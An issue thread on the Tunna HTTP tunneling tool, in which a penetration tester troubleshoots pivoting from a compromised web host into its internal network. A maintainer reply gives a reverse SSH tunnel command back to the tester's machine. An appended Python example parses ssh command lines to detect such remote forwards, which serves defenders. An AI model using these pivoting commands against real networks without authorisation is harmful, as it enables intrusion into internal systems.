Open ypde opened 7 years ago
Are you using it as a socks4 server or trying to connect to a specific port at the target?
Hi, I also have the same problem:
$ python proxy.py -u http://x.x.x.x:8181/lang/conn.php -l 6666 -v
Tunna v1.1a, for HTTP tunneling TCP connections by Nikos Vassakis
http://www.secforce.com / nikos.vassakis
[+] Sending File
[Server] File Uploaded at /tmp/901-socks4aServer.py
[+] Spawning keep-alive thread
[Server] All good to go, ensure the listener is working ;-)
[-] Keep-alive thread exited
[!] Received Interrupt or Something Went Wrong
[-] Disconnected
Can you tell me how to solve it? Thanks.
Does it exit immediately or when you try to proxy the connection?
It exits immediately, before I try to proxy.
Could you tell me the version of php and the underlying system and I'll try to replicate.
OK, this is the output when I run these commands on the target host:
/usr/www/lang # php -v
PHP 5.6.9 (cli) (built: Mar 28 2017 12:56:09)
Copyright (c) 1997-2015 The PHP Group
Zend Engine v2.6.0, Copyright (c) 1998-2015 Zend Technologies
/usr/www/lang # uname -a
Linux TNAS-1DEF 4.0.0 #306 SMP Mon Mar 27 17:02:54 CST 2017 x86_64 GNU/Linux
/usr/www/lang # iptables -L
/bin/sh: iptables: not found
Another piece of information is that I also tried some other proxy and forwarding tools like Tunna, such as reGeorg and s5.py, and they all failed too. After a discussion with my friend, I guess that this problem is not due to Tunna but is about the target machine. Maybe there are some network filters or limits on the target host, but I couldn't find anything like a firewall (you can see the result of the iptables command; I also ran ps aux and found nothing that looks like a firewall), so I guess there may be some limits or filters at the hardware level.
Anyway, I'm unfamiliar with these networking things. These are all my guesses. What do you think about this?
I initially thought it might be python not installed on the target host but you wouldn't be able to run s5.py at all. It might be php's configuration killing long running threads and both Tunna and reGeorg use the same technique for socket persistence - which is a long running thread.
Does running Tunna without the socks server work?
Also, what are you trying to achieve? I might be able to point you to another direction.
Does running Tunna without the socks server work?
Emmmm... You mean add the --no-socks option? I tried, and got the same error.
I'm doing a penetration test. I have gained root privileges on the web host, and now I want to use it as a springboard to access other hosts in the compromised host's Intranet. Installing penetration tools on the compromised host may not be suitable, and some services like web or RDP can't be accessed via a terminal alone, so I think I may need some proxy and forwarding tools to help me do it.
At first my thought was to use this host as a proxy, so I could use proxychains + nmap on my host to scan their Intranet, but as I have said, the proxy tools all failed. So I wrote a small Python script, ran it on the target host, and did find some live hosts. Some of these have the web service port 80 open, but it can only be accessed from within the Intranet. Now I'm confused about what to do next. Maybe directly write a proxy PHP page to request the Intranet web service? But what if I want to access the RDP service on port 3389 on an Intranet host?
Thank you, any suggestion will be helpful ;)
Can you use any other port on the server? There is a python webserver implementation for Tunna that could potentially work.
Also I was experimenting with this some time ago: http://www.secdev.org/projects/tuntap_udp/files/tunproxy.py
It essentially creates a VPN-like interface (without the encryption) on the server (-s option) and client (-c option). If the kernel has the module to support it and IP forwarding is enabled on the server, this could work.
It seems that I can't use any other port on the server. I tried to open another port for a SOCKS forward proxy; I ran the netstat -lnpt command and found that the port was indeed open, but I couldn't connect to it.
Maybe there is no more common solution, and I think I should check the specific scenario carefully to find a way out based on it.
Probably it is behind a firewall. The only easy alternative is to do a reverse TCP connection - make the target host connect to you and forward the port. E.g. expose SSH on your-Machine and from the target run:
ssh -fN -R 7000:localhost:7000 username@your-Machine
Now every connection to localhost:7000 on your-Machine will be forwarded to localhost:7000 on the target.
More here: http://www.thegeekstuff.com/2013/11/reverse-ssh-tunnel
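For defenders, the reverse forward suggested above is visible in the process list of the host that starts it. The following is an added example, not part of the thread or of Tunna: it parses ssh client command lines for remote forwards, including bundled flags and `-o RemoteForward`, while ignoring a `-R` that belongs to the remote command. The process listing and the function names are constructed for illustration.

```python
import shlex

# ssh(1) client options that take an argument (from the OpenSSH manual page).
OPTS_WITH_ARG = set("BbcDEeFIiJLlmOopQRSWw")

def remote_forwards(cmdline):
    """Return the remote-forward specs (-R / -o RemoteForward) in one ssh command line."""
    argv = shlex.split(cmdline)
    if not argv or argv[0].rsplit("/", 1)[-1] != "ssh":
        return []
    specs, seen_dest, i = [], False, 1
    while i < len(argv):
        arg = argv[i]
        i += 1
        if not arg.startswith("-"):
            if seen_dest:
                break             # second bare word starts the remote command
            seen_dest = True      # options may still follow the destination
            continue
        j = 1
        while j < len(arg):       # walk bundled flags such as -fNR7000:...
            opt, j = arg[j], j + 1
            if opt not in OPTS_WITH_ARG:
                continue
            if j < len(arg):
                value = arg[j:]   # value glued to the flag
            else:
                value = argv[i] if i < len(argv) else ""
                i += 1            # value is the next token
            if opt == "R":
                specs.append(value)
            elif opt == "o" and value.lower().startswith("remoteforward"):
                specs.append(value[len("remoteforward"):].lstrip("= "))
            break
    return specs

def scan(ps_output):
    """Return (pid, user, specs) for each 'pid user command' line with a remote forward."""
    hits = []
    for line in ps_output.splitlines():
        parts = line.split(None, 2)
        if len(parts) == 3 and remote_forwards(parts[2]):
            hits.append((int(parts[0]), parts[1], remote_forwards(parts[2])))
    return hits

# Constructed sample listing (pid, user, command line); not real host data.
SAMPLE_PS = """\
1201 www-data ssh -fN -R 7000:localhost:7000 username@your-Machine
1202 root ssh -fNR7000:localhost:7000 username@your-Machine
1203 alice ssh -p 2222 -i /home/alice/.ssh/id_ed25519 alice@build01
1204 bob /usr/bin/ssh -o "RemoteForward 7000 localhost:7000" -N bob@your-Machine
1205 carol ssh carol@db01 grep -R TODO /srv
1206 dave ssh dave@your-Machine -N -R 7000:localhost:7000
"""
```

`scan(SAMPLE_PS)` reports PIDs 1201, 1202, 1204 and 1206; a web-server account such as `www-data` holding an outbound ssh session with a remote forward is the case worth alerting on.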
Tunna v1.1a, for HTTP tunneling TCP connections by Nikos Vassakis http://www.secforce.com / nikos.vassakis secforce.com
###############################################################
[+] Spawning keep-alive thread
[-] Keep-alive thread exited
[!] Received Interrupt or Something Went Wrong
[-] Disconnected